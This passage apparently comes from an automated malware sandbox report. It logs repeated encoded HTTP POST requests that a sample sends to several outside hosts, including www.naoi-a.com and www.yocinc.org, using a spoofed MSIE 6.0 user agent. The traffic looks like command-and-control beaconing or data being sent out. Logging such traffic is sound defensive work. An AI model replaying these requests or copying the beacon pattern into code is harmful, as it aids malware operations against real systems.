34 30 66 71 79 30 4f 44 39 6c 6f 31 42 37 6b 2f 53 45 47 74 70 46 6c 68 76 30 54 66 59 43 6a 50 4c 73 72 58 39 6f 57 71 44 44 65 46 78 47 59 55 67 32 6c 76 45 6a 48 37 36 47 56 79 63 38 64 67 52 67 59 6e 54 2b 32 74 41 77 61 39 38 63 62 4c 59 37 35 2f 32 73 39 48 58 61 66 43 70 73 52 4b 6f 6e 70 50 58 59 4c 5a 64 55 43 43 63 33 54 6a 36 43 64 58 34 6a 66 39 30 6d 4f 30 6a 4b 6c 5a 53 2b 4a 70 4b 4e 52 37 71 38 61 59 73 6f 41 76 57 70 49 37 56 59 6c 5a 59 52 48 44 6f 43 6e 4e 78 64 52 6c 31 6c 77 52 49 41 76 50 2f 35 6a 54 38 54 71 56 2f 66 6c 37 7a 56 69 75 68 6b 48 6b 75 67 31 42 72 58 34 78 69 54 30 35 75 51 6e 4a 31 31 47 33 71 38 63 58 46 41 57 31 71 70 70 47 6c 55 75 2f 76 57 69 49 46 36 54 70 53 72 6d 4e 66 78 4f 47 63 35 6d 57 66 71 61 31 48 4d 2f 64 63 73 56 38 6f 62 56 78 67 59 68 4c 66 6b 73 58 35 69 4d 2b 43 44 6c 4f 56 33 4e 56 56 48 52 36 5a 4a 69 39 2b 68 76 66 49 49 4d 4f 61 52 33 2f 41 53 42 6a 37 79 35 76 53 51 2b 62 67 79 73 7a 64 65 30 6b 61 42 32 72 74 54 30 41 6f 4e 47 48 79 43 61 43 47 49 53 46 63 75 59 67 62 45 57 58 4e 6a 77 73 35 48 33 65 30 46 54 7a 43 5a 5a 79 47 51 51 34 6d 50 4a 65 78 34 64 71 69 2f 2b 32 62 58 32 45 53 75 44 61 52 62 63 49 2f 41 61 4b 6d 78 34 51 51 4c 76 4c 2f 2b 4b 73 4d 4c 45 33 Data Ascii: O4rh5mhOUcalEyzfK171W9tJ6ulwwdffHDDuEyGWPaQsAmGRzV0bgfWtM89SthWm7MAydmUdcxNGlGi67Us7M6eUV9tr30K6V7xjakO/56lMs4GT9cs4GH1/hl/0x5MIqeJSwTm6Dk1labSb8l1fJ34RFTv5NSpBy8qcps2If8aCIzgD6oHlO+rU40fqy0OD9lo1B7k/SEGtpFlhv0TfYCjPLsrX9oWqDDeFxGYUg2lvEjH76GVyc8dgRgYnT+2tAwa98cbLY75/2s9HXafCpsRKonpPXYLZdUCCc3Tj6CdX4jf90mO0jKlZS+JpKNR7q8aYsoAvWpI7VYlZYRHDoCnNxdRl1lwRIAvP/5jT8TqV/fl7zViuhkHkug1BrX4xiT05uQnJ11G3q8cXFAW1qppGlUu/vWiIF6TpSrmNfxOGc5mWfqa1HM/dcsV8obVxgYhLfksX5iM+CDlOV3NVVHR6ZJi9+hvfIIMOaR3/ASBj7y5vSQ+bgyszde0kaB2rtT0AoNGHyCaCGISFcuYgbEWXNjws5H3e0FTzCZZyGQQ4mPJex4dqi/+2bX2ESuDaRbcI/AaKmx4QQLvL/+KsMLE3
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 52 6b 6c 42 2b 65 79 57 53 63 62 2f 79 4d 38 49 31 36 56 5a 58 66 2b 59 77 64 64 45 62 74 4e 33 34 47 5a 69 41 79 6e 7a 77 6c 4f 4a 54 73 34 39 67 76 4d 72 34 64 69 77 6e 69 6d 69 33 35 72 51 54 42 72 79 58 74 4b 6c 6f 68 37 34 67 78 76 49 35 73 45 36 77 68 32 77 53 32 66 61 46 4c 59 33 53 6f 69 53 48 79 71 4f 52 35 36 53 6e 61 72 4c 39 76 61 4f 61 33 30 74 77 64 77 66 68 39 67 32 4c 30 76 33 48 71 59 30 53 52 63 4c 37 51 6c 75 62 6c 5a 6d 53 30 50 4f 39 44 43 36 57 6b 66 6c 30 54 67 63 50 4d 57 4f 6d 33 77 6e 62 6a 7a 68 73 43 48 68 75 55 55 74 54 50 45 6b 58 2b 4b 67 34 52 5a 4c 6c 53 35 6c 70 74 4e 66 71 74 43 2f 45 4a 5a 65 4c 4c 6e 36 39 65 37 30 77 4b 64 61 51 2f 42 66 61 51 65 78 73 69 53 75 34 51 58 7a 52 4c 37 49 37 37 44 71 64 44 34 61 43 68 6e 39 50 4d 48 4e 4e 6a 52 6e 46 69 64 52 5a 4c 68 46 38 34 61 6d 4c 4b 57 78 6e 77 57 32 52 6d 58 62 66 6e 59 6b 37 6f 33 7a 4e 77 65 54 36 50 55 65 2b 78 4d 32 53 4a 52 65 51 44 42 30 34 52 69 6a 54 71 73 42 62 4e 79 34 74 38 4f 4c 70 66 66 74 49 6b 74 45 6b 6a 73 4d 71 67 4e 69 73 79 36 65 7a 73 55 59 39 7a 41 4c 79 4e 52 2b 53 69 52 38 65 52 32 51 54 4e 70 36 32 59 32 44 72 76 65 6d 6a 34 4e 63 61 68 32 55 74 41 79 73 4c 41 36 74 2f 73 58 31 63 39 79 6a 70 4e 65 78 6e 76 35 2f 59 33 2b 59 7a 2b 48 53 53 51 50 6b 41 4c 70 61 6b 6d 50 77 46 52 72 44 35 51 75 68 30 52 58 61 50 6a 58 2b 2b 52 58 6f 36 58 6b 2f 35 4a 6d 6d 46 62 6b 72 34 41 54 36 66 62 77 4e 30 52 36 68 39 63 74 6f 61 6e 4d 62 50 36 41 39 54 2f 31 6b 50 2f 53 57 57 78 63 4c 38 63 51 47 45 7a 4a 67 58 35 56 59 47 57 54 69 39 79 34 6c 55 6d 56 52 42 31 49 45 49 4e 62 43 39 6f 54 6c 2b 51 6e 75 57 4f 55 3d Data Ascii: RklB+eyWScb/yM8I16VZXf+YwddEbtN34GZiAynzwlOJTs49gvMr4diwnimi35rQTBryXtKloh74gxvI5sE6wh2wS2faFLY3SoiSHyqOR56SnarL9vaOa30twdwfh9g2L0v3HqY0SRcL7QlublZmS0PO9DC6Wkfl0TgcPMWOm3wnbjzhsCHhuUUtTPEkX+Kg4RZLlS5lptNfqtC/EJZeLLn69e70wKdaQ/BfaQexsiSu4QXzRL7I77DqdD4aChn9PMHNNjRnFidRZLhF84amLKWxnwW2RmXbfnYk7o3zNweT6PUe+xM2SJReQDB04RijTqsBbNy4t8OLpfftIktEkjsMqgNisy6ezsUY9zALyNR+SiR8eR2QTNp62Y2Drvemj4Ncah2UtAysLA6t/sX1c9yjpNexnv5/Y3+Yz+HSSQPkALpakmPwFRrD5Quh0RXaPjX++RXo6Xk/5JmmFbkr4AT6fbwN0R6h9ctoanMbP6A9T/1kP/SWWxcL8cQGEzJgX5VYGWTi9y4lUmVRB1IEINbC9oTl+QnuWOU=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 74 56 51 46 39 31 75 45 53 63 59 41 45 32 71 6d 63 75 33 4a 68 55 51 2f 55 62 72 68 35 62 55 4d 76 38 4d 4f 45 36 45 58 41 33 6f 42 4f 67 6c 30 6a 59 70 7a 37 42 46 43 7a 45 6b 50 35 57 62 4a 7a 6e 33 39 78 65 6a 5a 6f 57 43 45 70 55 65 70 76 64 75 68 76 66 41 72 68 69 48 42 2b 42 54 49 72 34 57 79 77 51 79 67 4f 52 46 77 51 57 44 63 65 61 45 67 47 6b 5a 66 37 58 53 4d 56 41 65 4b 68 66 31 75 53 6a 73 2b 2f 62 71 44 68 32 47 56 66 71 6f 4b 4b 79 75 52 39 61 50 69 4d 72 76 50 66 66 71 79 30 41 33 33 4b 69 61 67 71 6e 42 76 66 58 74 70 70 2f 63 39 6a 39 52 41 4d 6f 75 59 39 39 74 79 63 68 32 46 49 50 30 73 68 6d 76 6e 58 74 70 44 2b 32 59 71 66 4d 54 54 52 6d 6b 7a 4f 42 31 33 6f 48 73 5a 61 50 53 32 76 30 57 6e 66 32 66 74 72 31 70 49 6c 6d 57 4d 72 75 55 66 6e 32 6b 53 4f 67 69 56 44 44 2f 78 47 67 47 44 6a 7a 51 4c 71 49 48 4a 48 32 7a 4f 78 77 71 38 63 6f 4b 48 63 4f 4a 74 66 4c 49 32 30 6e 6d 4e 4e 31 79 46 35 33 53 31 53 6f 58 33 48 35 65 35 49 30 36 66 6b 46 38 2b 32 6f 48 67 67 38 4d 46 6d 72 73 45 66 35 31 54 30 68 7a 47 69 66 58 34 63 4a 42 6e 6a 2f 47 69 67 59 30 57 37 75 37 67 66 63 4a 76 52 69 43 64 73 31 4e 58 73 6c 69 53 69 59 65 5a 74 4c 36 56 52 79 72 6e 55 4d 35 46 6a 44 36 65 64 68 68 4f 77 49 4c 46 63 6f 5a 44 47 42 72 76 30 34 36 75 62 58 56 39 32 30 6f 47 66 68 4d 5a 4c 5a 6d 46 77 55 6b 59 34 55 65 41 4a 45 62 42 4f 6b 65 36 4b 79 63 6a 74 66 63 35 6c 53 62 61 69 31 59 34 52 43 32 2b 57 62 4d 55 6c 73 39 43 6b 36 68 76 6f 63 6c 74 57 4c 74 6d 56 4f 4d 38 52 48 35 65 37 34 45 2b 70 30 65 49 71 75 71 38 77 5a 71 56 67 6e 66 64 50 70 2f 32 68 45 6e 56 4b 4d 4a 54 51 6c 39 54 66 51 6d 65 47 77 4e 48 6d 6a 63 67 2b 7a 72 4a 52 6d 56 6d 7a 38 66 71 30 4c 75 56 61 56 70 72 56 35 4b 42 68 49 42 77 77 54 34 65 69 36 47 37 Data Ascii: tVQF91uEScYAE2qmcu3JhUQ/Ubrh5bUMv8MOE6EXA3oBOgl0jYpz7BFCzEkP5WbJzn39xejZoWCEpUepvduhvfArhiHB+BTIr4WywQygORFwQWDceaEgGkZf7XSMVAeKhf1uSjs+/bqDh2GVfqoKKyuR9aPiMrvPffqy0A33KiagqnBvfXtpp/c9j9RAMouY99tych2FIP0shmvnXtpD+2YqfMTTRmkzOB13oHsZaPS2v0Wnf2ftr1pIlmWMruUfn2kSOgiVDD/xGgGDjzQLqIHJH2zOxwq8coKHcOJtfLI20nmNN1yF53S1SoX3H5e5I06fkF8+2oHgg8MFmrsEf51T0hzGifX4cJBnj/GigY0W7u7gfcJvRiCds1NXsliSiYeZtL6VRyrnUM5FjD6edhhOwILFcoZDGBrv046ubXV920oGfhMZLZmFwUkY4UeAJEbBOke6Kycjtfc5lSbai1Y4RC2+WbMUls9Ck6hvocltWLtmVOM8RH5e74E+p0eIquq8wZqVgnfdPp/2hEnVKMJTQl9TfQmeGwNHmjcg+zrJRmVmz8fq0LuVaVprV5KBhIBwwT4ei6G7
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 7a 6d 44 6f 72 63 4a 30 54 38 5a 48 31 7a 41 61 74 53 33 76 58 55 58 33 4b 62 6a 53 46 2b 31 42 46 69 63 48 73 71 6f 4f 62 63 2f 33 72 57 32 4b 72 50 56 79 43 61 4b 52 4c 7a 31 68 47 67 59 6f 6b 6d 63 77 68 41 6c 76 44 6e 68 68 62 6f 2b 66 39 67 5a 52 6e 68 6e 42 6d 50 42 32 70 5a 7a 6f 4c 41 6e 31 4c 30 4f 78 72 65 5a 58 6a 55 59 61 37 46 4c 38 4f 66 54 64 2f 76 56 6d 61 4a 58 37 30 31 31 54 77 61 63 47 72 66 7a 47 52 48 46 37 4c 63 70 49 4c 6c 47 57 6f 31 30 61 53 35 64 6e 7a 77 53 67 45 75 74 6c 31 61 53 6d 66 34 44 62 67 48 54 6a 70 6f 79 37 79 41 44 72 45 64 66 76 56 6e 41 39 68 38 6e 65 39 37 4a 7a 6c 6c 32 56 53 6a 56 67 36 73 7a 33 73 6f 47 58 54 69 4a 47 48 6d 46 78 34 6a 48 4e 53 48 77 71 63 34 6d 30 65 4b 72 46 33 55 66 44 59 34 37 32 46 41 6c 68 6b 6d 76 42 42 46 51 53 6b 78 63 59 39 55 52 75 7a 64 70 71 4c 62 71 72 37 42 6f 50 45 63 43 6e 79 70 6a 30 37 67 51 65 54 2f 79 2b 68 62 48 5a 46 79 4e 57 6c 6e 7a 4b 44 54 36 39 39 31 43 67 71 6b 56 6d 67 45 4d 41 37 59 55 56 44 6d 49 43 65 46 33 4a 5a 56 6a 6c 45 53 58 75 65 6c 50 76 7a 4b 30 44 43 5a 4e 76 75 57 49 6d 4f 43 30 49 6e 4f 59 79 69 31 47 78 77 46 62 51 6e 4b 6e 4c 74 5a 77 65 7a 70 73 4f 76 4a 33 6d 71 47 2f 59 66 52 52 4a 48 77 2b 6b 4a 54 6c 50 4a 4c 51 50 47 56 46 61 65 77 6c 49 6e 74 32 48 59 7a 6c 34 36 4a 41 79 37 4c 64 78 33 36 66 76 6a 31 59 68 6f 6e 52 4a 39 58 56 68 58 49 68 6d 56 36 77 39 45 4b 43 30 34 39 50 43 38 30 67 63 69 38 47 52 4e 69 68 35 43 67 4b 6e 52 44 37 42 49 78 78 2b 2b 42 4a 4c 34 51 6d 57 72 48 74 4b 75 7a 6f 30 38 76 4a 2f 70 75 54 41 54 66 36 58 5a 37 5a 32 31 4f 74 50 30 4d 5a 71 59 59 54 59 4a 6d 5a 4d 57 4d 55 41 Data Ascii: zmDorcJ0T8ZH1zAatS3vXUX3KbjSF+1BFicHsqoObc/3rW2KrPVyCaKRLz1hGgYokmcwhAlvDnhhbo+f9gZRnhnBmPB2pZzoLAn1L0OxreZXjUYa7FL8OfTd/vVmaJX7011TwacGrfzGRHF7LcpILlGWo10aS5dnzwSgEutl1aSmf4DbgHTjpoy7yADrEdfvVnA9h8ne97Jzll2VSjVg6sz3soGXTiJGHmFx4jHNSHwqc4m0eKrF3UfDY472FAlhkmvBBFQSkxcY9URuzdpqLbqr7BoPEcCnypj07gQeT/y+hbHZFyNWlnzKDT6991CgqkVmgEMA7YUVDmICeF3JZVjlESXuelPvzK0DCZNvuWImOC0InOYyi1GxwFbQnKnLtZwezpsOvJ3mqG/YfRRJHw+kJTlPJLQPGVFaewlInt2HYzl46JAy7Ldx36fvj1YhonRJ9XVhXIhmV6w9EKC049PC80gci8GRNih5CgKnRD7BIxx++BJL4QmWrHtKuzo08vJ/puTATf6XZ7Z21OtP0MZqYYTYJmZMWMUA
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 4f 34 72 68 35 6d 68 4f 55 63 61 6c 45 79 7a 66 4b 31 37 31 57 39 74 4a 36 75 6c 77 77 64 66 66 48 44 44 75 45 79 47 57 50 61 51 73 41 6d 47 52 7a 56 30 62 67 66 57 74 4d 38 39 53 74 68 57 6d 37 4d 41 79 64 6d 55 64 63 78 4e 47 6c 47 69 36 37 55 73 37 4d 36 65 55 56 39 74 72 33 30 4b 36 56 37 78 6a 61 6b 4f 2f 35 36 6c 4d 73 34 47 54 39 63 73 34 47 48 31 2f 68 6c 2f 30 78 35 4d 49 71 65 4a 53 77 54 6d 36 44 6b 31 6c 61 62 53 62 38 6c 31 66 4a 33 34 52 46 54 76 35 4e 53 70 42 79 38 71 63 70 73 32 49 66 38 61 43 49 7a 67 44 36 6f 48 6c 4f 2b 72 55 34 30 66 71 79 30 4f 44 39 6c 6f 31 42 37 6b 2f 53 45 47 74 70 46 6c 68 76 30 54 66 59 43 6a 50 4c 73 72 58 39 6f 57 71 44 44 65 46 78 47 59 55 67 32 6c 76 45 6a 48 37 36 47 56 79 63 38 64 67 52 67 59 6e 54 2b 32 74 41 77 61 39 38 63 62 4c 59 37 35 2f 32 73 39 48 58 61 66 43 70 73 52 4b 6f 6e 70 50 58 59 4c 5a 64 55 43 43 63 33 54 6a 36 43 64 58 34 6a 66 39 30 6d 4f 30 6a 4b 6c 5a 53 2b 4a 70 4b 4e 52 37 71 38 61 59 73 6f 41 76 57 70 49 37 56 59 6c 5a 59 52 48 44 6f 43 6e 4e 78 64 52 6c 31 6c 77 52 49 41 76 50 2f 35 6a 54 38 54 71 56 2f 66 6c 37 7a 56 69 75 68 6b 48 6b 75 67 31 42 72 58 34 78 69 54 30 35 75 51 6e 4a 31 31 47 33 71 38 63 58 46 41 57 31 71 70 70 47 6c 55 75 2f 76 57 69 49 46 36 54 70 53 72 6d 4e 66 78 4f 47 63 35 6d 57 66 71 61 31 48 4d 2f 64 63 73 56 38 6f 62 56 78 67 59 68 4c 66 6b 73 58 35 69 4d 2b 43 44 6c 4f 56 33 4e 56 56 48 52 36 5a 4a 69 39 2b 68 76 66 49 49 4d 4f 61 52 33 2f 41 53 42 6a 37 79 35 76 53 51 2b 62 67 79 73 7a 64 65 30 6b 61 42 32 72 74 54 30 41 6f 4e 47 48 79 43 61 43 47 49 53 46 63 75 59 67 62 45 57 58 4e 6a 77 73 35 48 33 65 30 46 54 7a 43 5a 5a 79 47 51 51 34 6d 50 4a 65 78 34 64 71 69 2f 2b 32 62 58 32 45 53 75 44 61 52 62 63 49 2f 41 61 4b 6d 78 34 51 51 4c 76 4c 2f 2b 4b 73 4d 4c 45 33 Data Ascii: O4rh5mhOUcalEyzfK171W9tJ6ulwwdffHDDuEyGWPaQsAmGRzV0bgfWtM89SthWm7MAydmUdcxNGlGi67Us7M6eUV9tr30K6V7xjakO/56lMs4GT9cs4GH1/hl/0x5MIqeJSwTm6Dk1labSb8l1fJ34RFTv5NSpBy8qcps2If8aCIzgD6oHlO+rU40fqy0OD9lo1B7k/SEGtpFlhv0TfYCjPLsrX9oWqDDeFxGYUg2lvEjH76GVyc8dgRgYnT+2tAwa98cbLY75/2s9HXafCpsRKonpPXYLZdUCCc3Tj6CdX4jf90mO0jKlZS+JpKNR7q8aYsoAvWpI7VYlZYRHDoCnNxdRl1lwRIAvP/5jT8TqV/fl7zViuhkHkug1BrX4xiT05uQnJ11G3q8cXFAW1qppGlUu/vWiIF6TpSrmNfxOGc5mWfqa1HM/dcsV8obVxgYhLfksX5iM+CDlOV3NVVHR6ZJi9+hvfIIMOaR3/ASBj7y5vSQ+bgyszde0kaB2rtT0AoNGHyCaCGISFcuYgbEWXNjws5H3e0FTzCZZyGQQ4mPJex4dqi/+2bX2ESuDaRbcI/AaKmx4QQLvL/+KsMLE3
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=itstfzxkxoxpnauzzfcixwhstikzroxs; _mcnc=1Data Raw: 6c 6e 77 31 78 35 2b 6d 50 38 5a 7a 49 72 32 37 2f 73 4f 55 37 79 68 4f 2f 73 4a 31 54 37 4c 6c 51 34 69 48 76 44 4b 6c 71 66 30 41 4d 37 41 49 39 77 5a 44 4a 41 45 71 4a 65 6f 32 43 42 45 38 53 54 30 4f 2f 43 63 2b 51 46 77 75 66 33 4b 31 70 6f 79 2f 34 63 37 65 30 31 58 53 70 69 77 43 2f 53 52 77 61 4c 31 6c 68 74 68 61 50 74 4e 61 68 2b 74 31 57 6e 6f 53 6b 63 46 42 4b 63 58 38 59 45 79 79 38 49 65 63 6c 4f 58 32 50 50 51 6b 75 76 69 4d 69 2f 57 31 46 79 4b 5a 48 43 50 64 31 39 63 69 57 53 66 72 42 57 2b 69 37 6a 68 75 47 42 4a 68 5a 66 54 74 37 75 66 69 6f 5a 35 6f 4e 49 58 32 63 33 78 36 6c 39 6d 63 5a 6d 63 2f 6e 62 44 39 34 56 6c 37 44 38 31 75 77 4a 54 74 4e 45 36 54 46 37 30 38 76 4d 51 61 53 6d 6b 43 66 52 6f 47 42 38 6f 75 48 58 44 70 66 74 47 67 6a 44 6c 63 79 6b 6d 6f 76 4b 67 36 77 4d 30 6b 5a 53 31 64 2b 39 51 4f 62 6e 75 38 71 50 6e 32 4d 39 49 2b 4b 4f 58 4f 76 4e 45 49 41 4a 55 65 53 50 4c 66 49 73 66 39 4f 57 36 57 62 33 42 56 4b 74 57 6a 36 45 46 44 4b 42 68 7a 4d 57 72 69 7a 43 69 50 42 49 30 73 64 30 57 36 34 47 4e 4f 6f 67 6c 75 46 68 71 2f 54 6f 68 44 6f 4d 74 65 6b 36 4f 4f 31 5a 4e 6a 75 77 55 6b 36 59 68 39 66 5a 34 63 49 76 74 75 4a 4f 2b 64 45 50 6f 38 68 41 57 32 43 35 33 31 75 46 73 5a 38 68 30 44 4d 71 63 6c 45 34 75 34 45 4c 66 6b 31 71 74 31 4e 71 7a 34 56 44 71 67 79 35 68 37 50 64 59 2b 56 64 4b 77 31 41 4e 51 66 50 33 73 78 70 2f 64 64 48 58 68 54 49 75 64 51 36 44 55 2b 38 69 53 7a 4d 4e 58 65 45 62 4f 78 59 67 38 51 47 7a 6f 6f 59 44 74 6a 4d 42 2f 39 42 76 42 70 67 44 66 53 72 47 30 4e 58 43 4b 78 68 5a 72 69 77 77 39 31 74 59 31 67 6d 65 4b 77 4a 68 64 51 67 4d 65 35 31 6e 59 65 45 73 3d Data Ascii: lnw1x5+mP8ZzIr27/sOU7yhO/sJ1T7LlQ4iHvDKlqf0AM7AI9wZDJAEqJeo2CBE8ST0O/Cc+QFwuf3K1poy/4c7e01XSpiwC/SRwaL1lhthaPtNah+t1WnoSkcFBKcX8YEyy8IeclOX2PPQkuviMi/W1FyKZHCPd19ciWSfrBW+i7jhuGBJhZfTt7ufioZ5oNIX2c3x6l9mcZmc/nbD94Vl7D81uwJTtNE6TF708vMQaSmkCfRoGB8ouHXDpftGgjDlcykmovKg6wM0kZS1d+9QObnu8qPn2M9I+KOXOvNEIAJUeSPLfIsf9OW6Wb3BVKtWj6EFDKBhzMWrizCiPBI0sd0W64GNOogluFhq/TohDoMtek6OO1ZNjuwUk6Yh9fZ4cIvtuJO+dEPo8hAW2C531uFsZ8h0DMqclE4u4ELfk1qt1Nqz4VDqgy5h7PdY+VdKw1ANQfP3sxp/ddHXhTIudQ6DU+8iSzMNXeEbOxYg8QGzooYDtjMB/9BvBpgDfSrG0NXCKxhZriww91tY1gmeKwJhdQgMe51nYeEs=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 52 6b 6c 42 2b 65 79 57 53 63 62 2f 79 4d 38 49 31 36 56 5a 58 66 2b 59 77 64 64 45 62 74 4e 33 34 47 5a 69 41 79 6e 7a 77 6c 4f 4a 54 73 34 39 67 76 4d 72 34 64 69 77 6e 69 6d 69 33 35 72 51 54 42 72 79 58 74 4b 6c 6f 68 37 34 67 78 76 49 35 73 45 36 77 68 32 77 53 32 66 61 46 4c 59 33 53 6f 69 53 48 79 71 4f 52 35 36 53 6e 61 72 4c 39 76 61 4f 61 33 30 74 77 64 77 66 68 39 67 32 4c 30 76 33 48 71 59 30 53 52 63 4c 37 51 6c 75 62 6c 5a 6d 53 30 50 4f 39 44 43 36 57 6b 66 6c 30 54 67 63 50 4d 57 4f 6d 33 77 6e 62 6a 7a 68 73 43 48 68 75 55 55 74 54 50 45 6b 58 2b 4b 67 34 52 5a 4c 6c 53 35 6c 70 74 4e 66 71 74 43 2f 45 4a 5a 65 4c 4c 6e 36 39 65 37 30 77 4b 64 61 51 2f 42 66 61 51 65 78 73 69 53 75 34 51 58 7a 52 4c 37 49 37 37 44 71 64 44 34 61 43 68 6e 39 50 4d 48 4e 4e 6a 52 6e 46 69 64 52 5a 4c 68 46 38 34 61 6d 4c 4b 57 78 6e 77 57 32 52 6d 58 62 66 6e 59 6b 37 6f 33 7a 4e 77 65 54 36 50 55 65 2b 78 4d 32 53 4a 52 65 51 44 42 30 34 52 69 6a 54 71 73 42 62 4e 79 34 74 38 4f 4c 70 66 66 74 49 6b 74 45 6b 6a 73 4d 71 67 4e 69 73 79 36 65 7a 73 55 59 39 7a 41 4c 79 4e 52 2b 53 69 52 38 65 52 32 51 54 4e 70 36 32 59 32 44 72 76 65 6d 6a 34 4e 63 61 68 32 55 74 41 79 73 4c 41 36 74 2f 73 58 31 63 39 79 6a 70 4e 65 78 6e 76 35 2f 59 33 2b 59 7a 2b 48 53 53 51 50 6b 41 4c 70 61 6b 6d 50 77 46 52 72 44 35 51 75 68 30 52 58 61 50 6a 58 2b 2b 52 58 6f 36 58 6b 2f 35 4a 6d 6d 46 62 6b 72 34 41 54 36 66 62 77 4e 30 52 36 68 39 63 74 6f 61 6e 4d 62 50 36 41 39 54 2f 31 6b 50 2f 53 57 57 78 63 4c 38 63 51 47 45 7a 4a 67 58 35 56 59 47 57 54 69 39 79 34 6c 55 6d 56 52 42 31 49 45 49 4e 62 43 39 6f 54 6c 2b 51 6e 75 57 4f 55 3d Data Ascii: RklB+eyWScb/yM8I16VZXf+YwddEbtN34GZiAynzwlOJTs49gvMr4diwnimi35rQTBryXtKloh74gxvI5sE6wh2wS2faFLY3SoiSHyqOR56SnarL9vaOa30twdwfh9g2L0v3HqY0SRcL7QlublZmS0PO9DC6Wkfl0TgcPMWOm3wnbjzhsCHhuUUtTPEkX+Kg4RZLlS5lptNfqtC/EJZeLLn69e70wKdaQ/BfaQexsiSu4QXzRL7I77DqdD4aChn9PMHNNjRnFidRZLhF84amLKWxnwW2RmXbfnYk7o3zNweT6PUe+xM2SJReQDB04RijTqsBbNy4t8OLpfftIktEkjsMqgNisy6ezsUY9zALyNR+SiR8eR2QTNp62Y2Drvemj4Ncah2UtAysLA6t/sX1c9yjpNexnv5/Y3+Yz+HSSQPkALpakmPwFRrD5Quh0RXaPjX++RXo6Xk/5JmmFbkr4AT6fbwN0R6h9ctoanMbP6A9T/1kP/SWWxcL8cQGEzJgX5VYGWTi9y4lUmVRB1IEINbC9oTl+QnuWOU=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 74 56 51 46 39 31 75 45 53 63 59 41 45 32 71 6d 63 75 33 4a 68 55 51 2f 55 62 72 68 35 62 55 4d 76 38 4d 4f 45 36 45 58 41 33 6f 42 4f 67 6c 30 6a 59 70 7a 37 42 46 43 7a 45 6b 50 35 57 62 4a 7a 6e 33 39 78 65 6a 5a 6f 57 43 45 70 55 65 70 76 64 75 68 76 66 41 72 68 69 48 42 2b 42 54 49 72 34 57 79 77 51 79 67 4f 52 46 77 51 57 44 63 65 61 45 67 47 6b 5a 66 37 58 53 4d 56 41 65 4b 68 66 31 75 53 6a 73 2b 2f 62 71 44 68 32 47 56 66 71 6f 4b 4b 79 75 52 39 61 50 69 4d 72 76 50 66 66 71 79 30 41 33 33 4b 69 61 67 71 6e 42 76 66 58 74 70 70 2f 63 39 6a 39 52 41 4d 6f 75 59 39 39 74 79 63 68 32 46 49 50 30 73 68 6d 76 6e 58 74 70 44 2b 32 59 71 66 4d 54 54 52 6d 6b 7a 4f 42 31 33 6f 48 73 5a 61 50 53 32 76 30 57 6e 66 32 66 74 72 31 70 49 6c 6d 57 4d 72 75 55 66 6e 32 6b 53 4f 67 69 56 44 44 2f 78 47 67 47 44 6a 7a 51 4c 71 49 48 4a 48 32 7a 4f 78 77 71 38 63 6f 4b 48 63 4f 4a 74 66 4c 49 32 30 6e 6d 4e 4e 31 79 46 35 33 53 31 53 6f 58 33 48 35 65 35 49 30 36 66 6b 46 38 2b 32 6f 48 67 67 38 4d 46 6d 72 73 45 66 35 31 54 30 68 7a 47 69 66 58 34 63 4a 42 6e 6a 2f 47 69 67 59 30 57 37 75 37 67 66 63 4a 76 52 69 43 64 73 31 4e 58 73 6c 69 53 69 59 65 5a 74 4c 36 56 52 79 72 6e 55 4d 35 46 6a 44 36 65 64 68 68 4f 77 49 4c 46 63 6f 5a 44 47 42 72 76 30 34 36 75 62 58 56 39 32 30 6f 47 66 68 4d 5a 4c 5a 6d 46 77 55 6b 59 34 55 65 41 4a 45 62 42 4f 6b 65 36 4b 79 63 6a 74 66 63 35 6c 53 62 61 69 31 59 34 52 43 32 2b 57 62 4d 55 6c 73 39 43 6b 36 68 76 6f 63 6c 74 57 4c 74 6d 56 4f 4d 38 52 48 35 65 37 34 45 2b 70 30 65 49 71 75 71 38 77 5a 71 56 67 6e 66 64 50 70 2f 32 68 45 6e 56 4b 4d 4a 54 51 6c 39 54 66 51 6d 65 47 77 4e 48 6d 6a 63 67 2b 7a 72 4a 52 6d 56 6d 7a 38 66 71 30 4c 75 56 61 56 70 72 56 35 4b 42 68 49 42 77 77 54 34 65 69 36 47 37 Data Ascii: 